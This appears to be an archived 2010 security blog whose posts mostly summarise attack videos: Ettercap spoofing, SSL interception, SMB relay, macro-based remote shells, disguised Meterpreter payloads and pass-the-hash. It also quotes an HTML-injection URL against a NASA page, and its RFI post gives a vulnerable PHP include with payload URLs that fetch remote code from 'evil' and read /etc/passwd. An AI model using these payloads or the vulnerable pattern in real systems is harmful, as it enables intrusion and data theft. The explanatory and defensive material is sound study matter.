Friday, April 30, 2010

DNS Spoofing And Browser Spying Part 1



This is the first video of three parts that explains various examples of sniffing using the Ettercap-NG tool, on BackTrack-4, in a Local Area Network scenario. This part explains OS Fingerprinting - Arp Poisoning and one example using Etterfilter.

Wednesday, April 28, 2010

HTML Injection in NASA Website

Last February 25, 2010 I made a full disclosure type of post here regarding multiple nasa.gov server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.

http://starbrite.jpl.nasa.gov/pds/viewDataset.jsp?dsid=error%3E%3Ciframe%20src=%22http://www.hackthissite.org%22%20%20height=%22300%22%20width=%22800%22%3E%3C/iframe%3E

Monday, April 26, 2010

Sniffing SSL Secured Logins with Ettercap


A Small video showing how easy it is to intercept HTTPS traffic from switched local network by spoofing the SSL certificate using man in the middle attack with Ettercap. The attacker uses one way ARP poisoning on victim and issues a fake spoofed SSL certificates on a switched Ethernet network.

Friday, April 23, 2010

DHCP Spoofing MITM Attack Using Ettercap



This video is showing how to spoof DHCP IP assignment using Ettercap. When a new PC is added on the network which is configured to have IP address dynamically from a DHCP address. An attcker can spoof this IP assignment process and provide his own IPs, like a gateway which has been configured to sniff their usernames and passwords.

Thursday, April 22, 2010

Bluetooth sniffing in Linux


A very good video showing how to sniff BlueTooth Pin while pairing two BlueTooth devices and then crack it. 

Tuesday, April 20, 2010

Securing Web Applications



Securing Web Services - Presentation Transcript
  1. Securing Web Applications Tara Kissoon, CISA, CISSP Visa Inc.
  2. Objectives The participant will learn more about: How to integrate OWASP Top 10 to mitigate Web application security vulnerabilities.
  3. What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration files, executable programs and data files. – Is layered above an operating system and uses the functionality of the operating system to deliver its service. – The operating system provides a number of mechanisms used for securing the application. – Contains security functionality that uses mechanisms not residing within the operating system.  
  4. This presentation is on Web Services Security , pointing at almost all of the fields requires attention for web application security.Shows how to effectively manage application development lifecycle and how to integrate Top 10 OWASP projects to develop any application keeping security in mind.

    A1 - Cross Site Scripting (XSS)

    A2 - Injection Flaws

    A3 - Malicious File Execution

    A4 - Insecure Direct Object Reference

    A5 - Cross Site Request Forgery (CSRF)

    A6 - Information Leakage and Improper Error Handling

    A7 - Broken Authentication and Session Management

    A8 - Insecure Cryptographic Storage

    A9 - Insecure Communications

    A10 - Failure to Restrict URL Access

Monday, April 19, 2010

Windows SMB Relay Exploit



In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.

A live demonstration of obtaining admin access on a Windows XP SP3 Machine. Exploits a flaw in Windows Server Message Block (SMB) which provides shared access to files and folders on network. Hacker utilizes Metasploits Framework to run the exploit.It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer and can even get a reverse shell.Hacker forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.For authentication target computer is forwarded to Metasploit.

Sunday, April 18, 2010

Remote Shell with a Word document



Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.

Friday, April 16, 2010

Honeypots


Honey Pot Systems are decoy servers or systems setup to gather information regarding an attacker or intruder into your system. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional level or system.

Honey Pots can be setup inside, outside or in the DMZ of a firewall design or even in all of the locations although they are most often deployed inside of a firewall for control purposes. In a sense, they are variants of standard Intruder Detection Systems (IDS) but with more of a focus on information gathering and deception.

An example of a Honey Pot systems installed in a traditional Internet security design:
figure 1
A Honey Pot system is setup to be easier prey for intruders than true production systems but with minor system modifications so that their activity can be logged of traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey can be monitored and saved.

Generally, there are two popular reasons or goals behind setting up a Honey Pot:
  1. Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems.
  2. Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute.
The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered.

Those goals are:
  1. The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT based system, it should appear to the potential intruder that the system has not been modified or they may disconnect before much information is collected.
  2. You need to be careful in what traffic you allow the intruder to send back out to the Internet for you don’t want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside of the firewall!)
  3. You will want to make your Honey Pot an interesting site by placing "Dummy" information or make it appear as though the intruder has found an "Intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate so that intruders will spend enough time investigating and perusing the system so that you are able to gather as much forensic information as possible.
Some caveats exist that should be considered when implementing a Honey pot system. Some of the more important are:

The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.

Thursday, April 15, 2010

PHP Remote File Inclusion



Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
  • Code execution on the web server
  • Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
  • Denial of Service (DoS)
  • Data Theft/Manipulation



In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function, most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive and if enabled it allows filesystem functions to use a URL which allow them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.

Example

Consider this PHP script (which includes a file specified by request):

   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
?>
method="get">
> type="submit"> >
The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:
  • /vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php
  • /vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
  • /vulnerable.php?COLOR=C:\\notes.txt - example using NULL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the Null character)

Wednesday, April 14, 2010

SSH Hacking



In this video, a shell script does the work on Linux to hack into a ssh account.  Then a dictionary attack is launched against SSH using the shell script to crack the password.

Tuesday, April 13, 2010

Using NetCat as a Backdoor


In this video a windows RPC exploit is used with the help of Metasploit on Backtrack.After exploiting the RPC vulnerability in windows,hacker uploads Netcat tool to regain access when ever he wants.

Monday, April 12, 2010

Metasploit Autopwn Tool

 

This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques. Just run the Metasploit framework and connect to sqlite database. Then run a port scan on victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result, Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.

Sunday, April 11, 2010

Dump Cleartext Passwords From Windows Memory



MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

Friday, April 9, 2010

DNS Spoof Virtual Hosts



DNS Spoofing is a type of MITM attack in which victim's computer is sent a fake DNS reply for a particular website,forcing his machine to visit a different site.But when this Spoofed IP is hosting multiple virtual sites with multiple Host Headers and attacker wants to use this IP as a fake DNS reply for DNS Spoofing then the server will not be able to determine the proper destination as Host Header will be missing in the request.Hence DNS Spoofing attack will not success.

In this video , Ettercap is combined with a C program to change the host header on the fly and submits a new get request to the web server, which allows an attacker to successfully launch DNS Spoofing attack with a IP hosting multiple virtual web sites.

Thursday, April 8, 2010

Attacking Oracle with the Metasploit Framework



The Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009, Oracle remains a major presence in database computing.
Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name Oracle comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.

Wednesday, April 7, 2010

Auditing Anti-Virus Configuration and Installation with Nessus 3



Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system. According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Tuesday, April 6, 2010

Exploiting XP with SAINT



The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, Web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability prove its existence without a doubt.

Monday, April 5, 2010

Exploiting Windows Vista with Core Impact 8



CORE IMPACT is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.
Core Impact is designed to attempt to evaluate the whole of the security in an office ecosystem, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well checking for compliance with government regulation.

Hacking Guestbook (Redirect)

Sunday, April 4, 2010

Owning with Nessus and Metasploit



Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets.
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Saturday, April 3, 2010

Packing Metasploit's Meterpreter with Calculator using IExpress



This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.

Friday, April 2, 2010

Meterpreter as a Backdoor



A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

Pass the Hash with modified SMB Client Vulnerability



A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host.

Thursday, April 1, 2010

Cracking Tutorial



Software cracking is the modification of software to remove protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware.
The distribution and use of cracked copies is illegal in almost every developed country. There have been many lawsuits over cracking software, but most had to do with the distribution of the duplicated product rather than the process of defeating the protection, due to the difficulty of constructing legally sound proof of individual guilt in the latter instance. In the United States, the Digital Millennium Copyright Act (DMCA) made software cracking, as well as the distribution of information that facilitates software cracking, illegal. However, the law has hardly been tested in U.S. courts in cases of reverse engineering for personal use only. The European Union passed the EU Copyright Directive in May 2001, which makes software copyright infringement illegal as the member states pass legislation pursuant to the directive.
Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security